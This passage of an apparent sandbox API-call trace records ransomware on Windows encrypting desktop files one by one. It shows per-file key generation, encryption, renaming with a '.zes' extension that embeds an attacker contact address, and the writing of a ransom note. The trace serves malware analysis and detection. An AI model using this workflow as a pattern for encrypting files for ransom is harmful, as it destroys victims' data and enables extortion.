dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0134.534] WriteFile (in: hFile=0x130, lpBuffer=0x56e0e8*, nNumberOfBytesToWrite=0x6c5, lpNumberOfBytesWritten=0x23fe528, lpOverlapped=0x0 | out: lpBuffer=0x56e0e8*, lpNumberOfBytesWritten=0x23fe528*=0x6c5, lpOverlapped=0x0) returned 1 [0134.535] CloseHandle (hObject=0x130) returned 1 [0134.535] GetProcessHeap () returned 0x520000 [0134.535] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56e0e8 | out: hHeap=0x520000) returned 1 [0134.536] GetProcessHeap () returned 0x520000 [0134.536] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5355d0 | out: hHeap=0x520000) returned 1 [0134.536] GetProcessHeap () returned 0x520000 [0134.536] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.536] FindClose (in: hFindFile=0x546448 | out: hFindFile=0x546448) returned 1 [0134.536] GetProcessHeap () returned 0x520000 [0134.536] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56ac90 | out: hHeap=0x520000) returned 1 [0134.536] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.536] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0e0a90, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x7baf9a20, ftLastAccessTime.dwHighDateTime=0x1d5e70b, ftLastWriteTime.dwLowDateTime=0x7baf9a20, ftLastWriteTime.dwHighDateTime=0x1d5e70b, nFileSizeHigh=0x0, nFileSizeLow=0x3662, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="S0OmtXwErpHh0OJ.flv", cAlternateFileName="S0OMTX~1.FLV")) returned 1 [0134.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\S0OmtXwErpHh0OJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\s0omtxwerphh0oj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0134.536] GetProcessHeap () returned 0x520000 [0134.536] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.536] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.536] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a0 | out: lpNewFilePointer=0x0) returned 1 [0134.536] WriteFile (in: hFile=0x134, lpBuffer=0x23ff7b0*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff7b0*, lpNumberOfBytesWritten=0x23ff780*=0xe, lpOverlapped=0x0) returned 1 [0134.537] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.537] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.537] GetProcessHeap () returned 0x520000 [0134.537] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.537] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ff768*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ff768*=0x50) returned 1 [0134.537] CryptDestroyKey (hKey=0x546448) returned 1 [0134.537] WriteFile (in: hFile=0x134, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ff780*=0x50, lpOverlapped=0x0) returned 1 [0134.537] WriteFile (in: hFile=0x134, lpBuffer=0x23ff788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff788*, lpNumberOfBytesWritten=0x23ff780*=0x4, lpOverlapped=0x0) returned 1 [0134.537] WriteFile (in: hFile=0x134, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff780*=0x10, lpOverlapped=0x0) returned 1 [0134.538] WriteFile (in: hFile=0x134, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ff780*=0x80, lpOverlapped=0x0) returned 1 [0134.538] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a8 | out: lpNewFilePointer=0x0) returned 1 [0134.538] WriteFile (in: hFile=0x134, lpBuffer=0x23ff798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff798*, lpNumberOfBytesWritten=0x23ff780*=0x8, lpOverlapped=0x0) returned 1 [0134.538] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.538] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.538] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.538] ReadFile (in: hFile=0x134, lpBuffer=0x2140020, nNumberOfBytesToRead=0x3662, lpNumberOfBytesRead=0x23ff78c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff78c*=0x3662, lpOverlapped=0x0) returned 1 [0134.538] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff768*=0x3670, dwBufLen=0x3670 | out: pbData=0x2140020*, pdwDataLen=0x23ff768*=0x3670) returned 1 [0134.538] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.538] WriteFile (in: hFile=0x134, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x3670, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff780*=0x3670, lpOverlapped=0x0) returned 1 [0134.538] CryptDestroyKey (hKey=0x546448) returned 1 [0134.538] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3754, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.539] SetEndOfFile (hFile=0x134) returned 1 [0134.541] GetProcessHeap () returned 0x520000 [0134.541] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.541] GetProcessHeap () returned 0x520000 [0134.541] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.541] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\S0OmtXwErpHh0OJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\s0omtxwerphh0oj.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\S0OmtXwErpHh0OJ.flv.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\s0omtxwerphh0oj.flv.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.545] CloseHandle (hObject=0x134) returned 1 [0134.546] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.546] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c12bf0, ftCreationTime.dwHighDateTime=0x1d5e7eb, ftLastAccessTime.dwLowDateTime=0x1f05c1f0, ftLastAccessTime.dwHighDateTime=0x1d5e25b, ftLastWriteTime.dwLowDateTime=0x1f05c1f0, ftLastWriteTime.dwHighDateTime=0x1d5e25b, nFileSizeHigh=0x0, nFileSizeLow=0x18db8, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="wS0c4nhKFr.gif", cAlternateFileName="WS0C4N~1.GIF")) returned 1 [0134.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\wS0c4nhKFr.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ws0c4nhkfr.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0134.546] GetProcessHeap () returned 0x520000 [0134.546] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.546] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.546] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a0 | out: lpNewFilePointer=0x0) returned 1 [0134.546] WriteFile (in: hFile=0x134, lpBuffer=0x23ff7b0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff7b0*, lpNumberOfBytesWritten=0x23ff780*=0x8, lpOverlapped=0x0) returned 1 [0134.547] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.547] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.547] GetProcessHeap () returned 0x520000 [0134.547] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.547] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ff768*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ff768*=0x40) returned 1 [0134.547] CryptDestroyKey (hKey=0x546448) returned 1 [0134.547] WriteFile (in: hFile=0x134, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ff780*=0x40, lpOverlapped=0x0) returned 1 [0134.547] WriteFile (in: hFile=0x134, lpBuffer=0x23ff788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff788*, lpNumberOfBytesWritten=0x23ff780*=0x4, lpOverlapped=0x0) returned 1 [0134.547] WriteFile (in: hFile=0x134, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff780*=0x10, lpOverlapped=0x0) returned 1 [0134.547] WriteFile (in: hFile=0x134, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ff780*=0x80, lpOverlapped=0x0) returned 1 [0134.548] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a8 | out: lpNewFilePointer=0x0) returned 1 [0134.548] WriteFile (in: hFile=0x134, lpBuffer=0x23ff798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff798*, lpNumberOfBytesWritten=0x23ff780*=0x8, lpOverlapped=0x0) returned 1 [0134.548] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.548] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.548] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.548] ReadFile (in: hFile=0x134, lpBuffer=0x2140020, nNumberOfBytesToRead=0x18db8, lpNumberOfBytesRead=0x23ff78c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff78c*=0x18db8, lpOverlapped=0x0) returned 1 [0134.548] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff768*=0x18dc0, dwBufLen=0x18dc0 | out: pbData=0x2140020*, pdwDataLen=0x23ff768*=0x18dc0) returned 1 [0134.549] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.549] WriteFile (in: hFile=0x134, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x18dc0, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff780*=0x18dc0, lpOverlapped=0x0) returned 1 [0134.550] CryptDestroyKey (hKey=0x546448) returned 1 [0134.550] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x18e94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.550] SetEndOfFile (hFile=0x134) returned 1 [0134.553] GetProcessHeap () returned 0x520000 [0134.553] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.553] GetProcessHeap () returned 0x520000 [0134.553] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.553] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\wS0c4nhKFr.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ws0c4nhkfr.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\wS0c4nhKFr.gif.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\ws0c4nhkfr.gif.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.553] CloseHandle (hObject=0x134) returned 1 [0134.553] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.553] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f18d60, ftCreationTime.dwHighDateTime=0x1d5e0d0, ftLastAccessTime.dwLowDateTime=0xd5079a10, ftLastAccessTime.dwHighDateTime=0x1d5e79b, ftLastWriteTime.dwLowDateTime=0xd5079a10, ftLastWriteTime.dwHighDateTime=0x1d5e79b, nFileSizeHigh=0x0, nFileSizeLow=0xcf00, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="YK9azGU-728BZMlu.mp4", cAlternateFileName="YK9AZG~1.MP4")) returned 1 [0134.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\YK9azGU-728BZMlu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\yk9azgu-728bzmlu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0134.554] GetProcessHeap () returned 0x520000 [0134.554] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.554] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.554] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a0 | out: lpNewFilePointer=0x0) returned 1 [0134.554] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.554] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.554] GetProcessHeap () returned 0x520000 [0134.554] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.554] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ff768*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ff768*=0x50) returned 1 [0134.554] CryptDestroyKey (hKey=0x546448) returned 1 [0134.554] WriteFile (in: hFile=0x134, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ff780*=0x50, lpOverlapped=0x0) returned 1 [0134.555] WriteFile (in: hFile=0x134, lpBuffer=0x23ff788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff788*, lpNumberOfBytesWritten=0x23ff780*=0x4, lpOverlapped=0x0) returned 1 [0134.555] WriteFile (in: hFile=0x134, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ff780*=0x10, lpOverlapped=0x0) returned 1 [0134.555] WriteFile (in: hFile=0x134, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ff780*=0x80, lpOverlapped=0x0) returned 1 [0134.555] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ff7a8 | out: lpNewFilePointer=0x0) returned 1 [0134.555] WriteFile (in: hFile=0x134, lpBuffer=0x23ff798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x23ff798*, lpNumberOfBytesWritten=0x23ff780*=0x8, lpOverlapped=0x0) returned 1 [0134.555] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ff784 | out: phKey=0x23ff784*=0x546448) returned 1 [0134.555] CryptSetKeyParam (hKey=0x546448, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.555] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.555] ReadFile (in: hFile=0x134, lpBuffer=0x2140020, nNumberOfBytesToRead=0xcf00, lpNumberOfBytesRead=0x23ff78c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ff78c*=0xcf00, lpOverlapped=0x0) returned 1 [0134.556] CryptEncrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ff768*=0xcf00, dwBufLen=0xcf00 | out: pbData=0x2140020*, pdwDataLen=0x23ff768*=0xcf00) returned 1 [0134.556] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.556] WriteFile (in: hFile=0x134, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xcf00, lpNumberOfBytesWritten=0x23ff780, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ff780*=0xcf00, lpOverlapped=0x0) returned 1 [0134.557] CryptDestroyKey (hKey=0x546448) returned 1 [0134.557] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xcfe4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.557] SetEndOfFile (hFile=0x134) returned 1 [0134.561] GetProcessHeap () returned 0x520000 [0134.561] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.561] GetProcessHeap () returned 0x520000 [0134.561] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.561] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\YK9azGU-728BZMlu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\yk9azgu-728bzmlu.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\YK9azGU-728BZMlu.mp4.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\yk9azgu-728bzmlu.mp4.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.562] CloseHandle (hObject=0x134) returned 1 [0134.563] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.563] FindNextFileW (in: hFindFile=0x53a5f8, lpFindFileData=0x23ff810 | out: lpFindFileData=0x23ff810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f18d60, ftCreationTime.dwHighDateTime=0x1d5e0d0, ftLastAccessTime.dwLowDateTime=0xd5079a10, ftLastAccessTime.dwHighDateTime=0x1d5e79b, ftLastWriteTime.dwLowDateTime=0xd5079a10, ftLastWriteTime.dwHighDateTime=0x1d5e79b, nFileSizeHigh=0x0, nFileSizeLow=0xcf00, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="YK9azGU-728BZMlu.mp4", cAlternateFileName="YK9AZG~1.MP4")) returned 0 [0134.563] GetProcessHeap () returned 0x520000 [0134.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.563] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff770, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.563] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588, pdwDataLen=0x23ff7d8 | out: pbData=0x535588, pdwDataLen=0x23ff7d8) returned 1 [0134.563] CryptDestroyKey (hKey=0x546448) returned 1 [0134.563] GetProcessHeap () returned 0x520000 [0134.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x5355d0 [0134.563] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff770, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.563] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5355d0, pdwDataLen=0x23ff7d8 | out: pbData=0x5355d0, pdwDataLen=0x23ff7d8) returned 1 [0134.563] CryptDestroyKey (hKey=0x546448) returned 1 [0134.563] GetProcessHeap () returned 0x520000 [0134.563] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6e0) returned 0x56d0e0 [0134.563] CryptImportKey (in: hProv=0x534c10, pbData=0x23ff770, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.563] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d0e0, pdwDataLen=0x23ff7d8 | out: pbData=0x56d0e0, pdwDataLen=0x23ff7d8) returned 1 [0134.563] CryptDestroyKey (hKey=0x546448) returned 1 [0134.563] wsprintfW (in: param_1=0x23fe7b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\readme-warning.txt") returned 90 [0134.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\readme-warning.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\sgnbgw8s2gtrd4\\readme-warning.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0134.564] WriteFile (in: hFile=0x134, lpBuffer=0x56d0e0*, nNumberOfBytesToWrite=0x6c5, lpNumberOfBytesWritten=0x23fe7b0, lpOverlapped=0x0 | out: lpBuffer=0x56d0e0*, lpNumberOfBytesWritten=0x23fe7b0*=0x6c5, lpOverlapped=0x0) returned 1 [0134.564] CloseHandle (hObject=0x134) returned 1 [0134.565] GetProcessHeap () returned 0x520000 [0134.565] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56d0e0 | out: hHeap=0x520000) returned 1 [0134.565] GetProcessHeap () returned 0x520000 [0134.565] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5355d0 | out: hHeap=0x520000) returned 1 [0134.565] GetProcessHeap () returned 0x520000 [0134.565] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.565] FindClose (in: hFindFile=0x53a5f8 | out: hFindFile=0x53a5f8) returned 1 [0134.565] GetProcessHeap () returned 0x520000 [0134.565] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56a9e0 | out: hHeap=0x520000) returned 1 [0134.565] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.565] FindNextFileW (in: hFindFile=0x53a568, lpFindFileData=0x23ffa98 | out: lpFindFileData=0x23ffa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5de1790, ftCreationTime.dwHighDateTime=0x1d5de38, ftLastAccessTime.dwLowDateTime=0xdbdffdb0, ftLastAccessTime.dwHighDateTime=0x1d5d9b7, ftLastWriteTime.dwLowDateTime=0xdbdffdb0, ftLastWriteTime.dwHighDateTime=0x1d5d9b7, nFileSizeHigh=0x0, nFileSizeLow=0x75fa, dwReserved0=0x520138, dwReserved1=0x77c7387a, cFileName="WGs9eIzE7L6We.odt", cAlternateFileName="WGS9EI~1.ODT")) returned 1 [0134.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\WGs9eIzE7L6We.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xgmd_gfdjhmfgmtglo\\wgs9eize7l6we.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 